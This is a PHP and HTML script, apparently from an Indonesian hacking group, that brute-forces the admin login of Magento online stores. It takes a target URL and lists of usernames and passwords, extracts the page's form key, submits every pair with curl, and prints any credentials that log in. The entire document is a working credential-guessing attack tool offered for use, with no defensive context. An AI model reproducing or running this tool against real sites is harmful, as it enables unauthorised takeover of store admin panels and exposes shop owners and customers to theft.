Magento CMS BruteForce Admin Login

<html>
    <head>
    <title>MAGENTO CMS ADMIN BruteForce - IndoXploit Coders Team</title>
    <meta name="author" content="Mr. Error 404 | IndoXploit"/>
    <meta charset="UTF-8"/>
    </head>
<center>
<html style="margin: 2em auto; color: #008000; background: #000000;">
<form method="post">
URL: <input type="text" name="url" size="35" height="10" style="padding-left: 5px; background: transparent; color: #bb0000; border: 1px #008000 solid;"value="http://www.target-magento.com/admin"><br>
<textarea placeholder="username" name="user" style="background: transparent; color: #bb0000; border: 1px #008000 solid; padding-left: 5px; margin: 5px auto; width: 400px; height: 250px; resize: none;"></textarea>
<textarea placeholder="password" name="password" style="background: transparent; color: #bb0000; border: 1px #008000 solid; padding-left: 5px; margin: 5px auto; width: 400px; height: 250px; resize: none;"></textarea><br>
<input type="submit" name="brute" style="width: 200px; height: 25px; background: transparent; color: #bb0000; border: 1px #008000 solid;">
</form>
</html>
<?php
$url = $_POST['url'];
$user = explode("\r\n", $_POST['user']);
$pass = explode("\r\n", $_POST['password']);
$go = $_POST['brute'];
if($go) {
    $ambil = htmlspecialchars(@file_get_contents($url));
    preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
    foreach($user as $admin) {
        foreach($pass as $pwd) {
            $data = array(
                "form_key" => $key[1],
                "login[username]" => $admin,
                "dummy" => "",
                "login[password]" => $pwd,
                );
            $c = curl_init();
                 curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
                 curl_setopt($c, CURLOPT_URL, $url);
                 curl_setopt($c, CURLOPT_POST, 1);
                 curl_setopt($c, CURLOPT_POSTFIELDS, $data);
                 curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
                 curl_setopt($c, CURLOPT_COOKIEFILE, 'cookie.txt');
                 curl_setopt($c, CURLOPT_COOKIESESSION, 1);
            $result = curl_exec($c);
            curl_close($c);
            if(preg_match("/Log Out/", $result)) {
                echo "<div style='margin: 7px auto;'></div>";
                echo "[+] Nyecan di: <b>$url</b><br>";
                echo "[+] <font color=lime>Admin berhasil di Brute!!!</font><br>";
                echo "[+] username: <font color=lime>$admin</font> | password: <font color=lime>$pwd</font><br>";
                echo "[+] Selamat Cokk, anda ganteng sekali!! leeel :v /<br>";
            } else {
                echo "<div style='margin: 7px auto;'></div>";
                echo "[+] Nyecan di: <b>$url</b><br>";
                echo "[!!] username: $admin | password: $pwd<br>";
                echo "[-] <font color=red>Gagal brute admin pake user & pass ini cok !</font><br>";
            }
        }
    }
echo "<div style='margin: 7px auto;'></div>";
echo "======================================================<br>";
echo "Tools ini dibuat oleh: IndoXploit Coders Team. | Copas Script gua berantemin lu jembut !! :3 <br>";
echo "======================================================<br>";
}
?>